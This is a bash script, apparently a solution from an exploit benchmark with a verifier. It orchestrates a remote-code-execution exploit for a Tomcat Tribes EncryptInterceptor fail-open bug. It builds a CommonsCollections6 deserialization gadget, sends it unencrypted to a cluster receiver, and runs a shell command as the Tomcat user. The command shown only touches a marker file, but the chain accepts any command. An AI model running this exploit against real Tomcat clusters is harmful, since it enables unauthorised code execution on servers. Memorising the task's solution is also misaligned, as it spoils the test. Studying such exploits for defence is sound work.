#!/usr/bin/env bash
#
# CVE-2026-34486 — Apache Tomcat Tribes EncryptInterceptor fail-open RCE.
#
# One-shot orchestrator:
#   1. Build a CommonsCollections6 Java deserialization gadget (pure Python, no
#      Java/ysoserial needed) whose payload runs:  touch <MARKER_PATH>
#   2. Wrap the raw (UNENCRYPTED) gadget in a Tomcat Tribes wire frame.
#   3. Send it to the cluster receiver. EncryptInterceptor.messageReceived() in
#      11.0.20 fails open: decrypt() throws GeneralSecurityException, is logged,
#      and super.messageReceived() forwards the raw bytes to
#      XByteBuffer.deserialize() -> ObjectInputStream.readObject() -> gadget fires
#      as the Tomcat service user, creating the marker file.
#
# Args:
#   $1 = target host        (e.g. 127.0.0.1)
#   $2 = target port        (Tribes receiver, e.g. 4000)
#   $3 = marker path        (verifier-dictated path embedding a fresh nonce,
#                            writable by the tomcat user, e.g. /marker/pwned-<nonce>)
set -euo pipefail

# All three positional arguments are mandatory; a missing one aborts with the
# usage line below (the `:?` expansion prints it to stderr and exits non-zero).
readonly usage='usage: run.sh <host> <port> <marker_path>'
target_host="${1:?${usage}}"
target_port="${2:?${usage}}"
marker_path="${3:?${usage}}"

# Directory holding this script; gadget.py and send.py are looked up next to it.
script_dir="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)"

# Scratch file for the serialized gadget, removed on every exit path.
payload_file="$(mktemp)"
cleanup() { rm -f -- "$payload_file"; }
trap cleanup EXIT

printf '%s\n' "[*] target = ${target_host}:${target_port}"
printf '%s\n' "[*] marker = ${marker_path}"

# Step 1: serialize the gadget. gadget.py receives the command as separate argv
# words; the marker path is embedded in the single `-c` string, so it is taken
# from $3 verbatim (the verifier dictates that path, per the header).
printf '%s\n' "[*] building CommonsCollections6 gadget (touch ${marker_path}) ..."
python3 "${script_dir}/gadget.py" /bin/sh -c "touch ${marker_path}" > "$payload_file"
payload_bytes="$(wc -c < "$payload_file")"
printf '%s\n' "[*] gadget = ${payload_bytes} bytes"

# Steps 2 and 3: send.py wraps the raw bytes in a Tribes frame and delivers it.
# The frame is deliberately unencrypted; per the header, the receiver's
# decrypt() failure is logged before the bytes are forwarded, so that log line
# is the trace a defender would see on the target.
printf '%s\n' "[*] sending unencrypted Tribes frame to fail-open EncryptInterceptor ..."
python3 "${script_dir}/send.py" "$target_host" "$target_port" "$payload_file"

# Nothing is read back from the target; success is only observable out of band.
printf '%s\n' "[*] frame delivered. The gadget executes inside the Tomcat JVM (the" \
  "    verifier observes the marker via its privileged channel)."
